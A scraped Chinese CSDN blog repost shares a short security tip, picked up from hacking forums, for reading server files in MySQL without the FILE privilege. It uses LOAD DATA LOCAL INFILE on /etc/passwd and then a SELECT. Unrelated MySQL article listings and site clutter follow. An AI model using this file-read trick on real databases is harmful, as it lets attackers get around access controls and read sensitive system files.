Reading files in MySQL with file_priv = no

最新推荐文章于 2024-04-16 16:53:34 发布
最新推荐文章于 2024-04-16 16:53:34 发布
阅读量570 收藏
点赞数
分类专栏: 编程

好吧,我是在法客上看到园长发的这篇文章,然后追到乌云,然后追到源头,觉得很是实用,所以就贴出来了。


All we know for reading files in MySQL we need file_priv permission.
But there is way for reading files without this permission.

We can create new table and fill this table with data from file:

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '';
and
select * from test;


参考:http://sb.f4ck.org/thread-18477-1-1.html

      http://zone.wooyun.org/content/12175

      https://bugscollector.com/tricks/

eT48_Sec
关注
专栏目录
MySQLLOAD_FILE方法在使用时的问题
舍得斋
03-26 4361
MySQLLOAD_FILE方法在使用时的问题: 在执行 UPDATE tables_name SET file_path=LOAD_FILE("/tmp/aa.txt") WHERE file_id=“1”; 时file_path的值一直为“NULL” 无法把文件导入到数据库里面
mysql.data_ version=1.0.5.13785_关于MySql安装和使用遇到的问题
weixin_36329899的博客
02-02 394
今天,新拿了一台服务器,准备做测试服务器,一般来说,简单的使用yum安装mysql就可以用了。但这台比较特殊。这台服务器上原来安装过mysql,但是启动不起来了,启动的时候报错,具体什么错误,没有具体去分析解决了,怕花费的时间太长,耽误环境部署。 于是决定重装mysql把原有的mysql卸载掉,把相关文件全部删掉,使用以下命令安装yum -y install mysql mysql-server...
mysql openfileslimit 设置_MySQL open_files_limit 设置【转】
weixin_33417140的博客
02-17 539
查看Mysqld 进程打开的文件描述符的数量:root@pts/0 #pidof mysqld7668 6539root@pts/0 # lsof -p 7668 | grep -E 'MYD|MYI' #查看打开的表mysqld 7668 mysql 22u REG 8,3 2048 16252958 /data1/db3306/mysq...
mysql-5.1_MySQL 5.1参数
weixin_39722563的博客
01-20 224
MySQL5.1.73参数Variable_name Valueauto_increment_increment 1auto_increment_offset 1autocommit ONautomatic_sp_privileges ONback_log 50basedir /usr/big_tables OFFbinlog_cache...
root .mysql secret_/root/.mysql_secret: No such file or directory
weixin_39807859的博客
01-18 151
Installing MySQL system tables...2020-02-18 00:51:06 0 [Warning] TIMESTAMP with implicit DEFAULT value is deprecated. Please use --explicit_defaults_for_timestamp server option (see documentation for ...
mysql 数据库 安全_如何确保您MySQL数据库安全
cumi7754的博客
07-31 1795
mysql 数据库 安全 我们开始之前的一些基本信息: (Some basic information before we get started:) Source: Center for Internet Security’s (CIS) Oracle MySQL Community Server 5.7 来源: 互联网安全中心(CIS)Oracle MySQL Community Server...
MySQL8.0修改lower_case_table_names参数导致重启失败
老叶茶馆
11-15 6148
事件起因:在测试一个数据迁移工具时,源端oracle19c数据迁移到目标端MySQL8.0,提示迁移目标端 Unknown database 'SBTEST',报错如下:2022-07-2910:08:19,155ERRORcom.greatsync.connector.jdbc.internal.ComplexJdbcOutputFormat[]-JDBCexecuteBatch...
Mysql8.0修改lower_case_table_names参数导致重启失败
GreatSQL2021的博客
08-29 3687
可见我们在使用mysql8.0前需要根据自己的使用场景评估是否要开启忽略大小写,如果需要开启忽略大小写,初始化前需要把lower-case-table-names=1写入到my.cnf配置文件中,这样才不会影响后续的使用。......
安装mysql的router_mysql-router的安装与使用
weixin_39633276的博客
01-19 662
mysql-router是mysql官方的轻量级的中间件主要有如下工能:功能 & 特性:1、流量分发(只向一个实例导入流量、如果当前的实例宕机了、就会向集群的下一个实例导入流量)2、一定的高可用能力3、比之前的官方中间件mysql-proxy性能上有好一点4、可以与mysql-fabric整合1、下载https://dev.mysql.com/get/Downloads/MySQL-Rou...
mysql router安装教程_mysql-router的安装与使用
weixin_29085151的博客
01-25 1546
mysql-router是mysql官方的轻量级的中间件主要有如下工能:功能 & 特性:1、流量分发(只向一个实例导入流量、如果当前的实例宕机了、就会向集群的下一个实例导入流量)2、一定的高可用能力3、比之前的官方中间件mysql-proxy性能上有好一点4、可以与mysql-fabric整合1、下载https://dev.mysql.com/get/Downloads/MySQL-Rou...
K8s(二十一):在 Kubernetes 集群中部署 MySQL8.0 高可用集群(1主2从)
热门推荐
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
04-16 1万+
🔴 K8s(二十一):在 Kubernetes 集群中部署 MySQL8.0 高可用集群(1主2从)
Linux7下Mysql5.7搭建MHA(0.58版本)
m0_37490944的博客
08-03 989
mysql MHA
mysql crash 如何导出数据库_XAMPP中MySQL数据库崩溃无法启动的探索及批量导出
weixin_29335033的博客
01-27 1165
本文主要介绍在XAMPP中数据库突然出现崩溃后无法启动,本人对处理方法的探索。并提供一个windows下批量导出数据库的脚本。尝试处理流程1. 先备份/xampp/mysql/data文件夹,如备份为databackup2. 检查mysql错误日志。看其中的提示,如果没有error类报错,尝试A:A1. 把原data文件夹删除,新建一个空白的data文件夹A2. 复制/xampp/mysql/ba...
MySQL 5.6 --> 5.7 的升级
qq_38215412的博客
09-20 1091
一、环境描述 数据库版本:MySQL5.6.20(GA) 数据库软件目录:/usr/local/mysql my.cnf位置:/etc/my.cnf 数据库data目录:/data/ 慢日志目录:/data/mysql-server.err 二、升级前准备 1、关闭MySQL,便于完成数据的备份与替换 1$ service mysqld stop
四轮转向汽车模型预测控制(MPC)路径跟踪 simulink-simscape仿真,无需carsim mpc基于车辆动力学模型
10-09
四轮转向汽车模型预测控制(MPC)路径跟踪 simulink-simscape仿真,无需carsim。 mpc基于车辆动力学模型设计,纵向PID控制。 支持平坦路面,颠簸路面切,外形变化。 魔术公式轮胎模型。 注:MATLAB要求2022a及以上版本
在给定足够的参数的情况下找到摩擦系数,并将系数与不同参数绘制成图表matlab代码.rar
10-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
全球自动食品预制袋包装机行业总体规模、主要企业国内外市场占有率及排名(2024版).docx
10-09
全球自动食品预制袋包装机行业总体规模、主要企业国内外市场占有率及排名(2024版).docx
Blackboard学习系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS).zip
最新发布
10-09
Blackboard学习系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS) 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
secure_file_priv=null该怎么解决
05-27
secure_file_priv=/path/to/directory ``` 请确保指定的目录具有足够的权限,使得 MySQL 用户可以在该目录中读取和写入文件。如果您不需要限制 MySQL 对文件的访问,可以将 secure_file_priv 设置为 null 或者注释...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值